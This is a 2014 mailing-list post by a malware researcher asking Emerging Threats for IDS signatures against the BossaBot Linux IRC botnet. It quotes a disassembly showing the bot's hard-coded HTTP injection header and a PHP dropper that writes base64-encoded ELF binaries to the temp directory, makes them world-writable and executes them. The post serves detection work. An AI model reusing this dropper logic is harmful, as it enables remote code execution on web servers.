[Emerging-Sigs] Request #3 - ET Signature for Linux Bossabot

Hendrik Adrian 1 at 1rik.com
Sun Sep 21 21:09:51 EDT 2014

Hello Will,
CC: ..and ET friends,

There is one more request. A route of Kaiten base code DDoS'er, was recoded
into an active evil botnet (IRC base), the actor called it as BossaBot.
Assisting Mr. Malekal Morte I am in charge to reversing the ELF binaries,
since 1st time the RFI attack spotted and botnet was spotted in some forum.

These are good chronological reference of the threat:
Malekal's report:
My reversing in monitoring this ELF threat:
Spiderlabs posted about this threat too:
...according to posts above you will see that the threat is important to

If ET sig doesn't cover this threat yet..I would like to request the ET sig
to block this RFI and the PHP infection (or "injection" is more like it).
If you think you have, please see the below details, in case anything can
be improved.

The problem of this proposal is, since the botnet attack request can only
be activated from the actor's IRC, it is a bit difficult to simulate the
attack to make a good capture PCAP (I tried many times), so there is no
PCAP. But we have THREE information that can be used to replace the PCAP to
generate sigs, as per follows:

(1) RFI and web file injection HTTP header injected log.

The log is available in here: http://pastebin.com/raw.php?i=KUTT2UQa <
@undeadsecurity was doing a good work in recording this (a credit)

(2) The latest ELF binary I reversed, was spotted 2 days ago, contains the
below data hard coded in the bins:


.rodata:0x0408540 aPostS?2d64616c
.rodata:0x0408540   db 'POST
.rodata:0x0408540   db
.rodata:0x0408540   db
.rodata:0x0408540   db
.rodata:0x0408540   db
.rodata:0x0408540   db
.rodata:0x0408540   db
.rodata:0x0408540   db
.rodata:0x0408540   db
.rodata:0x0408540   db
.rodata:0x0408540   db
.rodata:0x0408540   db
.rodata:0x0408540   db
.rodata:0x0408540   db
.rodata:0x0408540   db
.rodata:0x0408540   db 'D%%6E HTTP/1.1',0Dh,0Ah


.rodata:0x0408540   db 'Host: %s',0Dh,0Ah
.rodata:0x0408540   db 'User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:31.0)
Gecko/20100101 '
.rodata:0x0408540   db 'Firefox/31.0',0Dh,0Ah
.rodata:0x0408540   db 'Content-Type: application/x-www-form-urlencoded',0Dh
.rodata:0x0408540   db 'Content-Length: %d',0Dh,0Ah
.rodata:0x0408540   db 'Connection: close',0Dh,0Ah
.rodata:0x0408540   db 0Dh,0Ah
.rodata:0x0408540   db '%s',0
.rodata:0x04089D5   align 8
.rodata:0x04089D8 a?phpBufferfSBu
.rodata:0x04089D8   db '<?php',0Ah          ;
.rodata:0x04089D8   db '$bufferf = ',27h,'%s',27h,';',0Ah
.rodata:0x04089D8   db '$bufferf2 = ',27h,'%s',27h,';',0Ah
.rodata:0x04089D8   db '$Vdkqrxiiyr3t = sys_get_temp_dir();',0Ah
.rodata:0x04089D8   db '$Vgxl4ifsipo5 = getcwd();',0Ah
.rodata:0x04089D8   db '$Vos03apkyec1 = "OIOIU74u";',0Ah
.rodata:0x04089D8   db '$Vos03apkyec2 = "OIOIU74ux";',0Ah
.rodata:0x04089D8   db '$V5lgt4awdv3b = "chmod 777";',0Ah
.rodata:0x04089D8   db 'if (file_exists($Vdkqrxiiyr3t . "/$Vos03apkyec2"))',
.rodata:0x04089D8   db '{',0Ah
.rodata:0x04089D8   db 'exit(1);',0Ah
.rodata:0x04089D8   db '}else{',0Ah
.rodata:0x04089D8   db 'echo($Vdkqrxiiyr3t);',0Ah
.rodata:0x04089D8   db '$bufferf = base64_decode($bufferf);',0Ah
.rodata:0x04089D8   db '$bufferf2 = base64_decode($bufferf2);',0Ah
.rodata:0x04089D8   db 'file_put_contents("$Vdkqrxiiyr3t/$Vos03apkyec1",
.rodata:0x04089D8   db 'file_put_contents("$Vdkqrxiiyr3t/$Vos03apkyec2",
.rodata:0x04089D8   db 'chmod ($Vdkqrxiiyr3t."/".$Vos03apkyec1,0777);',0Ah
.rodata:0x04089D8   db 'system("$V5lgt4awdv3b " . $Vdkqrxiiyr3t
.rodata:0x04089D8   db 'chmod ($Vdkqrxiiyr3t."/".$Vos03apkyec2,0777);',0Ah
.rodata:0x04089D8   db 'system("$V5lgt4awdv3b " . $Vdkqrxiiyr3t
.rodata:0x04089D8   db 'system($Vdkqrxiiyr3t . "/$Vos03apkyec2");',0Ah
.rodata:0x04089D8   db 'system($Vdkqrxiiyr3t . "/$Vos03apkyec1");',0Ah
.rodata:0x04089D8   db 'exit(1);',0Ah
.rodata:0x04089D8   db '}',0Ah
.rodata:0x04089D8   db '?>',0Ah,0
.rodata:0x0408CE9   align 10h

Using the above (1) and (2) we can use the hard coded HTTP HEADER to be
blocked by ET Sigs.
Moreover, there is one more vector to use as filtration (below):

(3) The injected ELF file to the /tmp directory

$bufferf = 'f0VMRgEBAQMAAAAAAAAAAAIAAwABAAA....foo....';
$bufferf2 = 'f0VMRgIBAQMAAAAAAAAAAAIAPgABAA....bar...';

↑the above "$bufferf ="and "$buffer2 =" looks like a good spot to filter.
But only new version is using this, old version is using different scheme
(without PHP injection but PHP system command to wget the bins..)

If you need more confirmation, please do not hesitate to ask.
It will be nice if this threat also can be blocked.

Herewith I close the series of requests for ET sigs from MalwareMustDie,
total 3 DDoS botnets signature. Look forward for the reply with thank you
in advance.

Best regards always/Rick

Hendrik Adrian / @unixfreaxjp

MalwareMustDie,NPO Research Group
Web http://malwaremustdie.org
Research blog: http://malwaremustdie.blogspot.com
Wiki & Code: http://code.google.com/p/malwaremustdie/
Report Pastes: http://pastebin.com/u/MalwareMustDie

This email is confidential and may be legally privileged. It is intended
as a confidential communication only for the person(s) named above.
Any other use or disclosure is prohibited.
If you have received this message in error, please delete it, disregard its
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20140922/84dd178f/attachment-0001.html>

More information about the Emerging-sigs mailing list